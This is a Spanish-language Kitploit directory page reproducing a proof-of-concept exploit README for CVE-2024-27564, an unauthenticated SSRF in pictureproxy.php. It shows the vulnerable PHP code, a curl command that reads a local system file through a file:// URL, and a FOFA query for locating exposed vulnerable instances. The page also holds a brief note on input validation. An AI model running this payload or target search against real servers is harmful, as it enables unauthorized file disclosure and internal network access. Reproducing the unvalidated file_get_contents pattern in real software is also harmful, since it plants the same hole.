Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SSRF-Exploit-CVE-2024-27564 — Exploit de prueba de concepto para CVE-2024-27564, que demuestra SSRF a través de un parámetro URL no validado en pictureproxy.php. Incluye pruebas basadas en curl y búsqueda FOFA de instancias vulnerables. | Kitploit
Herramientas/GitHubGitHub/chaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubchaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564

SSRF-Exploit-CVE-2024-27564

Exploit de prueba de concepto para CVE-2024-27564, que demuestra SSRF a través de un parámetro URL no validado en pictureproxy.php. Incluye pruebas basadas en curl y búsqueda FOFA de instancias vulnerables.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 1 añoAún no revisado

SSRF-Exploit-CVE-2024-27564

Título del Proyecto

Este proyecto demuestra una vulnerabilidad de Server-Side Request Forgery (SSRF) en el archivo pictureproxy.php.

Descripción

Una vulnerabilidad en pictureproxy.php permite a atacantes remotos realizar solicitudes arbitrarias inyectando URLs en el parámetro url. Esta vulnerabilidad SSRF puede ser explotada sin autenticación, lo que la hace particularmente peligrosa.

El código vulnerable se encuentra en el archivo pictureproxy.php. El problema ocurre porque la función no valida correctamente el parámetro url. La variable $_GET['url'] se pasa a la función file_get_contents(), que obtiene contenido de la URL especificada. Esto puede llevar a SSRF.

Prueba de Concepto

Aquí hay una simple prueba de concepto que muestra cómo se puede explotar la vulnerabilidad:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Para probar la vulnerabilidad, puedes usar el siguiente comando curl:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Probado con Open Redirect

Una prueba usando una vulnerabilidad de open redirect:

root@kitploit:~
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg

Banner

Herramientas

  • FOFA: Un motor de búsqueda para dispositivos y vulnerabilidades de Internet. Usa el siguiente comando para buscar resultados relevantes:
root@kitploit:~
"title="ChatGPT个人专用版""

Conclusión

Este proyecto resalta la importancia de validar adecuadamente las entradas del usuario para evitar vulnerabilidades SSRF. Siempre asegúrate de que parámetros como las URLs sean verificados minuciosamente antes de ser procesados.

Descargar herramienta